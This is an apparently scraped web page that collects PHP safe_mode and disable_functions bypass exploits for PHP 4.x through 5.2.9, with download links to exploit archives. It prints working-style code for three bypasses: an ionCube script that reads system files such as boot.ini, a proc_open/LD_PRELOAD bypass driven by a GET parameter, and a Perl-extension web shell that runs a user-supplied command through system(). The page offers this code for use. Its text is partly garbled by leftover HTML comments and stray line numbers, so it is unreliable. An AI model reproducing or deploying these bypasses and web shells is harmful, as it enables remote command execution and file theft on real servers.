PHP safe mode bypass from 4.x to 5.x all.
Functions:
* mb_send_mail
* curl_init
* imap_open
* mail
* ioncube_read_file
* posix_getpwuid
* error_log
* extension_loaded
* copy
* procopen
A php code safe-mode-bypass.php for you:
http://img.vul.kr/uploads/20090722/1248265458safe-mode-bypass.zip
Some New Exploit:
* PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass
12345678910111213 <!--pif (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!");$path = str_repeat("..", 20);$MyBoot_readfile = readfile($path."windowssystem.ini"); #just to be sure that I set correctely disable_function :)$MyBoot_ioncube = ioncube_read_file($path."boot.ini");echo $MyBoot_readfile;echo " ionCube output: ";echo $MyBoot_ioncube;-->
* PHP < 5.2.5 Safe mode Bypass
http://img.vul.kr/uploads/20090722/1248268771p-hp-5.2.5.rar
* PHP 5.2.6 error_log safe_mode bypass
http://img.vul.kr/uploads/20090722/1248268875P-HP-5.2.6-error_log-safe_mode.txt
* PHP <= 5.2.9 Local Safemod Bypass Exploit (win32)
windows.zip" target=_blank>http://img.vul.kr/uploads/20090722/12482693952009-safemod-windows.zip
* PHP python extension safe_mode Bypass Local Vulnerability
http://img.vul.kr/uploads/20090722/1248270429python_bypass.txt
* PHP safe_mode bypass via proc_open() and custom environment
123456789101112131415 <!--p $path="/var/www"; //change to your writable path $a=fopen($path."/.comm","w"); fputs($a,$_GET["c"]); fclose($a); $descriptorspec = array( 0--> array("pipe", "r"), 1 => array("file", $path."/output.txt","w"), 2 => array("file", $path."/errors.txt", "a" ));$cwd = '.';$env = array('LD_PRELOAD' => $path."/a.so");$process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeedsleep(1);$a=fopen($path."/.comm1","r");echo "<strong>";while (!feof($a)){$b=fgets($a);echo $b;}fclose($a);?>;</strong>
PHP Perl Extension Safe_mode Bypass Exploit
1234567891011121314 <!--if(!extension_loaded('perl'))die('perl extension is not loaded');if(!isset($_GET))$_GET=&$HTTP_GET_VARS;if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';$perl=new perl();echo "<textarea rows='25' cols='75'>";$per-->eval("system('".$_GET['cmd']."')");echo "";$_GET['cmd']=htmlspecialchars($_GET['cmd']);echo "<form enctype="application/x-www-form-urlencoded" method="get">CMD:<input name="cmd" size="25" type="text" value="".$_GET[" /></form> "?>